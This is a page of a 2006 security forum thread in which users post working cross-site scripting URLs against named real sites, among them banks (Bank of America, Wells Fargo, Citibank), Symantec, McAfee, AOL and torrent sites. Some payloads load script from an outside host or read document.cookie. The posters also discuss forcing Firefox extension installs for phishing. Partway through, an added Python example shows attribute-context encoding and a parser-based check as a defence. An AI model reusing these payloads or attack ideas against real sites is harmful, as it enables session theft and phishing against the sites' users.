Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 22 of 65
Re: So it begins
Posted by: rsnake
Date: October 23, 2006 10:12PM

Style.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.style.com/services/newsletters&toolkit.application=newsletter&toolkit.applicationId=&formName=shortForm&partnerCode=&sourceCode=&newsletterAndVersions=newsletter.17&newsletterAndVersions=newsletter.35&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&IMAGE.x=0&IMAGE.y=0

Yah, she owns. Hahah...

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 23, 2006 10:13PM

I really recommend against dating him, girl: http://dontdatehimgirl.com/search/search_results.asp?search=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Search&search_options=+OR+

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: October 23, 2006 10:27PM

btw, do you know the answer to the question i asked on jeremiah grossman's blog? i haven't messed around much with extensions.. nor Firefox's security practices for em

Quote

well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org


So it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way

-maluc

Re: So it begins
Posted by: rsnake
Date: October 23, 2006 10:29PM

I'm not sure if doing something like a META refresh to a data directive might do it since it's on the same domain or not. I've done some tests and I was able to get over 3k into a single data directive, which should be enough to load an .xpi file. I think it's doable, but I'm not sure if it will cause a popup or not, I haven't gone that far into testing.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: October 23, 2006 10:42PM

well i was more curious about whether or not there's a way to bypass the 'Install' button before the extensions will download

i'll mess with it more when i find the time.. in the meantime i think i'll hold off on disclosing that XSS >.>

-maluc

Re: So it begins
Posted by: nrg
Date: October 24, 2006 01:12PM

i don't think you can do a silent install without some Firefox install, because an xpi from the allowed list pops up an install question.

--
http://chasenet.org/home/

Re: So it begins
Posted by: dveditz
Date: October 24, 2006 01:49PM

The www.mozilla.com and doctor.mozilla.org ones appear to have been fixed last night.

Re: So it begins
Posted by: maluc
Date: October 24, 2006 02:14PM

well good job to whatever mozilla dev reads this thread.. prompt fix

-maluc

Re: So it begins
Posted by: maluc
Date: October 24, 2006 02:32PM

http://www.rsnake.com/results.jsp?searchTerm=all%20his%20midget%20grannie%20porn%3Cscript%3Ealert%28%22zOMG+maluc+just+owned+RSnake.%21%22%29%3C%2Fscript%3E&x=0&y=0&domainName=rsnake.com&w=false

>.>
<.<

-maluc

Re: So it begins
Posted by: id
Date: October 24, 2006 03:02PM

oh if he only owned it ;)

-id

Re: So it begins
Posted by: rsnake
Date: October 24, 2006 04:20PM

Ugh, I hate the fact I don't own that domain... I'm not sure what I'd even do with it, but it sure sucks. That and hackers.com (they don't even respond to my bids).

Anyway, yes, nice quick fix from Mozilla! I think we have a few people very close to Mozilla reading the blog and this list. We get traffic from pretty much everywhere these days.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: October 24, 2006 08:39PM

http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

-maluc

Re: So it begins
Posted by: SkullyFM
Date: October 25, 2006 10:59AM

maluc Wrote:
-------------------------------------------------------
> http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

This has been fixed... thanks for pointing it out..



Edited 1 time(s). Last edit at 10/25/2006 10:59AM by SkullyFM.

Re: So it begins
Posted by: maluc
Date: October 25, 2006 12:49PM

and thanks for fixing it promptly ^^.. good job

-maluc

Re: So it begins
Posted by: unsticky
Date: October 25, 2006 04:57PM

[www.mymms.com]
[www2.mms.com]

In the spirit of Halloween, I thought I'd check out some of the sites on the candy wrappers...

Edit:
Unrelated to Halloween... Except for the whole food allergies thing...
[www.cfsan.fda.gov]



Edited 2 time(s). Last edit at 10/25/2006 05:16PM by unsticky.

Re: So it begins
Posted by: rsnake
Date: October 26, 2006 11:17AM

Happy Halloween to you too, Unsticky :)

http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&qxt=home&display=&dclksa=1

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: unsticky
Date: October 26, 2006 12:55PM

Why thank you, rsnake

[shopping.aol.com]



Edited 1 time(s). Last edit at 10/26/2006 01:03PM by unsticky.

Re: So it begins
Posted by: fogez
Date: October 26, 2006 03:55PM

I was looking for a granny...

http://www.perfectmatch.com/hp/pepper/Pepper14.asp?v=2&rt=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C!--

Re: So it begins
Posted by: unsticky
Date: October 26, 2006 04:46PM

[militaryhistory.about.com]
[search.about.com]

It appears that the offsite.htm xss vuln isn't restricted to just the militaryhistory subdomain, I believe it'll work with just about any of them. Also, the sdn variable can be used to redirect the user to any site, which I posted in the Redirects thread, as well.



Edited 2 time(s). Last edit at 10/26/2006 04:58PM by unsticky.

Re: So it begins
Posted by: rsnake
Date: October 26, 2006 10:28PM

http://searchg.symantec.com/search?q=';alert(%22XSS%22);//&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=gbh&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 26, 2006 10:46PM

McAfee: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.mcafee.com/virusInfo/default.asp&SearchType=2&searchString=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 26, 2006 11:22PM

Slight variation on Maluc's script where a semicolon wasn't allowed so you have to create two unique style tags: http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&question_box=%22style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22style=%22xx:expression(alert('XSS')%29&url=search/&ui_mode=question

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: unsticky
Date: October 27, 2006 12:08AM

[aiw2.uspto.gov]
[appft.uspto.gov]

[messageboards.aol.com]
[peopleconnection.aol.com]
[my.screenname.aol.com]
[www.aol.com] -- Header Splitting
[us.video.aol.com]
[account.login.aol.com]
[about.aol.com] -- Almost all the AOL subdomains are vuln to this one

[www.styledash.com] -- One of AOL's sites, I wasn't in the market for fashion tips...

rsnake, I hope you don't mind me using your s.js on the patent office's site... dunno if you appreciate such things showing up in logs and all... And my apologies for spending so much time on aol.com :X



Edited 12 time(s). Last edit at 10/27/2006 01:30AM by unsticky.

Re: So it begins
Posted by: fogez
Date: October 27, 2006 07:32AM

Create a boarding pass for NWA

http://www.dubfire.net/boarding_pass/nwa.php?fname=Osama&lname=Bin+Laden&seatnum=07-C&gatenum=A10&date=27OCT2006&flight=7305&gatenum=A10&deptcity=Indianapolis%2C+IN%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&destcity=Washington+-+Reagan+Nat%27l&depttime=10%3A50AM&desttime=1%3A30PM&class=Coach+Class

Re: So it begins
Posted by: maluc
Date: October 27, 2006 08:20AM

how about we start on bank sites.. i'll continue where rsnake left off

https://www.wellsfargo.com/app2k/prefill_invoke.jhtml?event=BeginAppsFlow&context=ApplicationViewAll&productsetid=APP2K&productcode=CH%22><script>alert(%22Happy%20Halloween%22)</script><x

-maluc

Re: So it begins
Posted by: maluc
Date: October 27, 2006 08:52AM

okie, well i'm not sure what can be done with this one.. but it's interesting as i don't see them very often. it's a cookie XSS .. using the cookie info:

Site: web.da-us.citibank.com
Cookie Name: username
Content: 1|asdf"><script>alert("XSS")</script><x

page that's XSS'ed: https://web.da-us.citibank.com/cgi-bin/citifi/scripts/login2/login.jsp?M=S

Can you forge cookies remotely using response splitting? Or perhaps with flash? i.e. is it exploitable for CSRF. At the very least, i suppose finding another XSS that's reflective can use this one to make a pseudo-persistent XSS, for the life of the cookie..

-maluc

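RSnake's Bank of America variant above (two separate style attributes because the filter dropped semicolons) and maluc's cookie-reflected XSS on the Citibank login page share one root cause: untrusted input, whether a query parameter or a cookie value, is pasted into an HTML attribute without attribute-context encoding. The Python below is an added example written for this thread, not code from the forum or from any of the sites named. The payload strings are constructed copies modelled on the ones posted, the cookie parser is a deliberate simplification, and the form templates are hypothetical. It renders the vulnerable and the encoded form side by side and uses the standard-library HTML parser to check which tags and attributes a browser would actually build from each.

```python
import html
from html.parser import HTMLParser

# Constructed payloads modelled on the ones posted in this thread (copies for
# testing, not the live URLs): an attribute breakout, and the two-style-attribute
# variant used when a filter rejects semicolons.
ATTRIBUTE_BREAKOUT = '1|asdf"><script>alert("XSS")</script><x'
DOUBLE_STYLE = ('"style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)'
                '"style="xx:expression(alert(1))')


def render_search_unescaped(search_term):
    """Vulnerable pattern (hypothetical template): the query parameter is pasted
    straight into an attribute value, so a quote in the input ends the attribute."""
    return f'<input type="text" name="q" value="{search_term}">'


def render_search(search_term):
    """Hardened form: attribute-context encoding turns ", <, >, & into entities,
    so the browser keeps the whole input inside the value attribute."""
    return f'<input type="text" name="q" value="{html.escape(search_term, quote=True)}">'


def parse_cookie_header(header):
    """Minimal Cookie-header parser (a simplification constructed for this
    example): returns a name -> value dict. It does no validation on purpose;
    the point is that a cookie value is attacker-influenced and must be encoded
    on output exactly like a query parameter."""
    pairs = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs[name] = value
    return pairs


def render_login_prefill(cookie_header):
    """Prefill a login form from the username cookie, as in the Citibank case,
    but with the cookie value encoded like any other untrusted input."""
    username = parse_cookie_header(cookie_header).get("username", "")
    return f'<input type="text" name="username" value="{html.escape(username, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, to see what a browser would
    build from the rendered markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """Return [(tag_name, {attr: value}), ...] for the given markup."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def is_safely_contained(markup, field_name, raw_input):
    """True only if the markup parses to exactly one input element whose value
    attribute is the raw input as literal text: no extra tags, no extra attributes."""
    tags = parse_tags(markup)
    if len(tags) != 1:
        return False
    tag, attrs = tags[0]
    return (tag == "input"
            and set(attrs) == {"type", "name", "value"}
            and attrs.get("name") == field_name
            and attrs.get("value") == raw_input)


if __name__ == "__main__":
    cases = [
        ("search, unescaped", render_search_unescaped(ATTRIBUTE_BREAKOUT)),
        ("search, escaped", render_search(ATTRIBUTE_BREAKOUT)),
        ("double style, unescaped", render_search_unescaped(DOUBLE_STYLE)),
        ("double style, escaped", render_search(DOUBLE_STYLE)),
        ("cookie prefill, escaped",
         render_login_prefill("session=abc; username=" + ATTRIBUTE_BREAKOUT)),
    ]
    for label, markup in cases:
        print(f"{label:26} tags={[t for t, _ in parse_tags(markup)]}")
```

The check is the part worth keeping: instead of grepping the output for `<script`, parse the rendered markup and confirm it yields exactly one element whose attribute value equals the raw input. A semicolon blocklist of the kind the Bank of America page apparently used still lets the double-attribute variant through, because the attacker never needs a semicolon to close the attribute; encoding `"` removes the ability to leave the attribute at all, so the variant never arises.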
Re: So it begins
Posted by: fogez
Date: October 27, 2006 09:06AM

Searching for granny downloads

http://www.torrentspy.com/uploadtorrent.asp?TN=asdf%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C%22&lngMainCat=&lngSubCat=&ts=
http://isohunt.com/torrents/?ihq=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Ctitle%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.torrentportal.com/torrents-upload.php&name=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Torrentportal
http://tr.searching.com/search.php?_br=tr&search=&words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cid=&type=2&exclude=&sizemin=&sizemax=&from_m=10&from_d=27&from_y=2001&to_m=10&to_d=27&to_y=2006&orderby=relevance&asc=0 - torrentreactor
http://btjunkie.org/search?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Ctitle%3E
http://www.mininova.org/search/?search=asdf%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cscript%3E

Re: So it begins
Posted by: unsticky
Date: October 27, 2006 11:25AM

[www.commerceonline.com]



Edited 1 time(s). Last edit at 10/27/2006 06:27PM by unsticky.

Re: So it begins
Posted by: fogez
Date: October 27, 2006 11:42AM

http://www.communitybanks.com/index.cfm?pag=23&searchstring=%3Cbody+onload%3Dalert%28%27xss%27%29%3E&submit.x=0&submit.y=0

Re: So it begins
Posted by: fogez
Date: October 27, 2006 01:41PM

http://www.cio-today.com/fullpage/fullpage.xhtml?dest=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
